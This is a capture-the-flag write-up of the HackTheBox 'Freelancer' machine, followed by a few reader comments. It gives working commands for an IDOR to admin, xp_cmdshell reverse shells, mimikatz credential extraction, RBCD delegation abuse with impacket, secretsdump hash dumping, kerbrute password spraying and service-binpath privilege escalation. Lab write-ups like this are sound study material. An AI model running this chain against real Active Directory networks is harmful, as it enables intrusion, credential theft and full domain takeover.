Hackthebox - Freelancer

0x1 Initial Reconnaissance

Nmap Results:

53/tcp: Simple DNS Plus
80/tcp: nginx 1.25.5
88/tcp: Microsoft Windows Kerberos
135/tcp: Microsoft Windows RPC
139/tcp: Microsoft Windows netbios-ssn
389/tcp: Microsoft Windows Active Directory LDAP
445/tcp: Microsoft Windows SMB
464/tcp: Kerberos kpasswd5
593/tcp: Microsoft Windows RPC over HTTP
3268/tcp: Microsoft Windows Active Directory LDAP
5985/tcp: Microsoft HTTPAPI httpd 2.0
9389/tcp: .NET Message Framing
49670/tcp - 62402/tcp: Microsoft Windows RPC

0x2 port 80

Web Application Access:

  • Create accounts as employee.
  • Reset the password for the employee account to bypass login errors.
    IDOR Vulnerability:
  • Capture and decode the QR code URL to identify an IDOR vulnerability.
  • Modify the decoded ID to gain admin access by changing the encoded base64 ID to 2.

0x3 Gaining SQL Shell

  • Access SQL Terminal: Execute commands in the SQL terminal from the admin panel.
  • Enable xp_cmdshell:
EXEC sp_configure 'show advanced options', '1'; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE;
  • Get Reverse Shell: Use xp_cmdshell to obtain a reverse shell as SQL_SVC

0x4 Lateral Movement

Enumerate SQL_SVC:

  • Retrieve passwords for the user mikasaAckerman stored in \Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI.
  • Get shell as mikasaAckerman using RunasCs
    Get user.txt
  • Bloodhound Data Collection:
python3 bloodhound.py -u mikasaAckerman -p 'PASSWORD' -d freelancer.htb -ns IP -c all

Memory Dump and Mail.txt:

  • Memory Dump: Found in MEMORY.7z, containing the dump of the processes of the whole server.
  • Mimikatz: Use to extract credentials.
  • Extract lsass.exe: Remove the process lsass.exe from the dump, focusing on lsass.exe to dump the SAM.
  • SAM Extraction: Find lorra199’s password in the SAM.

Shell as lorra199:

  • Use Evil-winrm to gain access as lorra199 using the found credentials
  • If we look at the bloodhound data we can see that lorra199 is a member of the AD Recycle Bin and has generic rights on the domain controller. WE can use this rights to abuse rbcd (resource-based constrained delegation) and impersonate as Administrator

Add Computer Account:

addcomputer.py -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'

Grant Delegation Rights:

impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -dc-ip 10.xx.xx.xx -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'

0x5 Domain Admin Access

  • Get Service Ticket using getST.py
getST.py -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.xx.xx.xx 'freelancer.htb/ATTACKERSYSTEM$:Summer2018!'
  • Dump Hashes using secretsdump.py
secretsdump.py 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.xx.xx.xx -target-ip 10.xx.xx.xx -just-dc-ntlm
  • use Evil-WInrm to gain access and Administrator and get root.txt

0x6 Unintended (Patched probably)

  • Spray the passwords using kerbrute
for i in `cat passwords.txt`; do ./kerbrute_linux_amd64 passwordspray -d freelancer.htb --dc userlist.txt $i;done > output.txt
  • You will get password for jmartinez
.\RunasCs.exe jmartinez "v3ryS0l!dP@sswd#35" cmd.exe -r 10.10.xx.xx:PORT


  • Abuse the server operator
sc.exe stop VMTools
sc.exe config VMTools binpath="cmd /c net localgroup administrators jmartinez /add"
sc.exe start VMTools

Change administrator password and get root flag.


I remember this challenge. The memory dump was a pain for me. Windbg+mimikatz were horrible

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WHEN I WAS DONE THIS CHALLANGE​:smiling_face_with_tear::smiling_face_with_tear::smiling_face_with_tear:

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Highly recommend rope and rope2 :joy: